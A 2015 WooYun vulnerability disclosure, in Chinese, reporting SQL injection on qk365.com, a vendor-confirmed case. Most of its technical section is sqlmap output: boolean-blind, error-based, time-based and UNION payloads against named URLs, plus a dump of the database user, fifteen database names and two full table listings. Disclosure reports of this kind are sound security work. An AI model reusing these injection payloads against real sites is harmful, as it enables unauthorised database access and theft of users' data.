当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152186

漏洞标题:青客主站SQL注射涉及全站数据库

相关厂商:qk365.com

漏洞作者: 路人甲

提交时间:2015-11-06 11:36

修复时间:2015-12-21 19:12

公开时间:2015-12-21 19:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-06: 细节已通知厂商并且等待厂商处理中
2015-11-06: 厂商已经确认,细节仅向厂商公开
2015-11-16: 细节向核心白帽子及相关领域专家公开
2015-11-26: 细节向普通白帽子公开
2015-12-06: 细节向实习白帽子公开
2015-12-21: 细节向公众公开

简要描述:

.

详细说明:

1,http://www.qk365.com/news/elive/infoRight_ajax.do?channelParPagemark=1&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20   
2,
www.qk365.com/news/elive/infoRight_ajaxLink.do?classPagemark=*&num=99&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481

漏洞证明:

---
Parameter: channelParPagemark (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: channelParPagemark=1') AND 9321=9321 AND ('LoVW'='LoVW&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: channelParPagemark=1') AND (SELECT 3580 FROM(SELECT COUNT(*),CONCAT(0x7176716b71,(SELECT (ELT(3580=3580,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('IeTY'='IeTY&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: channelParPagemark=1') AND (SELECT * FROM (SELECT(SLEEP(5)))CAhr) AND ('RfwH'='RfwH&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20
    Type: UNION query
    Title: Generic UNION query (NULL) - 20 columns
    Payload: channelParPagemark=1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176716b71,0x4a616c744d4654497046704a5a59714869496f7a6e695045566a4476414c76454c575a566e696f4c,0x716b716b71),NULL,NULL,NULL,NULL-- -&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20
---
back-end DBMS: MySQL 5.0
current user:    'yijia_guest@10.10.10.%'
current user is DBA:    False
available databases [15]:
[*] db_wuye
[*] ecombehaviour
[*] ecomhouserent
[*] freecms
[*] freecms_sim
[*] information_schema
[*] mysql
[*] partybuilding
[*] qingke_crm
[*] quartz
[*] quartz_kq
[*] quartz_pro
[*] quartz_rpt
[*] stock
[*] test
Database: ecomhouserent
[88 tables]
+------------------------------+
| activity                     |
| activity_room                |
| agency_clue                  |
| app_device_source            |
| app_login_source             |
| app_login_source_sync        |
| area                         |
| base_info                    |
| bill_manage                  |
| cell_area                    |
| cell_area_bak                |
| cell_area_copy               |
| cell_photo                   |
| cell_photo_temp              |
| collectionroom               |
| comment                      |
| contract                     |
| coupon_user_list             |
| customer_apply               |
| customer_book                |
| customer_cell                |
| customer_reminder            |
| customer_tenant              |
| customer_tenant_copy         |
| discuss                      |
| discuss_praise               |
| drawcode_list                |
| find_password                |
| gift_detail                  |
| gift_type                    |
| goddess                      |
| hot_search_keys              |
| info_notice                  |
| join_activity                |
| landmark                     |
| leave_message                |
| link_man                     |
| link_road                    |
| nyrecord                     |
| operatelog                   |
| owner_info                   |
| pay_type                     |
| payment                      |
| petty_expenses               |
| petty_item                   |
| promotion_coupon             |
| provincial                   |
| provincial_bak               |
| push_message                 |
| reservation                  |
| review                       |
| road                         |
| room                         |
| room_admin                   |
| room_recomm                  |
| room_view                    |
| share_record                 |
| sig_reservation_subscription |
| subscription                 |
| subway                       |
| subway_station_code          |
| t_coupons                    |
| t_coupons_code               |
| t_feedback                   |
| t_mer_info                   |
| tmp_a                        |
| user_openid                  |
| user_openid_copy             |
| v_find_booking               |
| v_find_interest_rooms        |
| v_find_new_rooms             |
| v_find_orderform             |
| v_find_reservation           |
| v_find_rom_recomm            |
| v_find_room_detail           |
| v_find_room_friends          |
| v_find_subscription          |
| v_find_taobao_room_detail    |
| v_rom_recomm                 |
| v_rom_rocomm_group           |
| v_room_compara               |
| v_stat_reservation           |
| v_wx_double12                |
| v_wx_double12_a              |
| v_wx_double12_b              |
| village_                     |
| vote                         |
| voucher                      |
+------------------------------+
Database: db_wuye
[54 tables]
+-----------------------------+
| account_payment_relation    |
| assign_log                  |
| bill_common                 |
| bill_detail                 |
| bill_task_bak               |
| bill_task_main              |
| building_num                |
| camera_link_log             |
| device_upload_info          |
| dict_data                   |
| dict_type                   |
| fee_cost                    |
| model_acitvity_log          |
| notice_info                 |
| pass_log                    |
| pay_mobile_call_log         |
| property_company            |
| rate_info                   |
| region_info                 |
| region_info_copy            |
| repair_attach               |
| repair_bill_info            |
| room_info                   |
| room_user_info              |
| room_user_relation          |
| sms_log                     |
| software_release            |
| sys_auth_info               |
| sys_log                     |
| sys_org_info                |
| sys_org_staff_relation      |
| sys_role_auth_relation      |
| sys_role_info               |
| sys_staff_info              |
| sys_staff_role_relation     |
| third_pay_backcall_log      |
| third_payment               |
| user_apply_info             |
| user_audit_log              |
| user_citizen                |
| user_command_log            |
| user_device_info            |
| user_door_detail            |
| user_enterprise             |
| user_face_pool              |
| user_info                   |
| user_message_read           |
| user_visitor_room_info      |
| user_worker_info            |
| village_info                |
| village_userworker_relation |
| visitor_log                 |
| visitor_third_log           |
| wx_token_record             |
+-----------------------------+

修复方案:

~~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-06 19:10

厂商回复:

非常感谢,已经安排紧急修复

最新状态:

暂无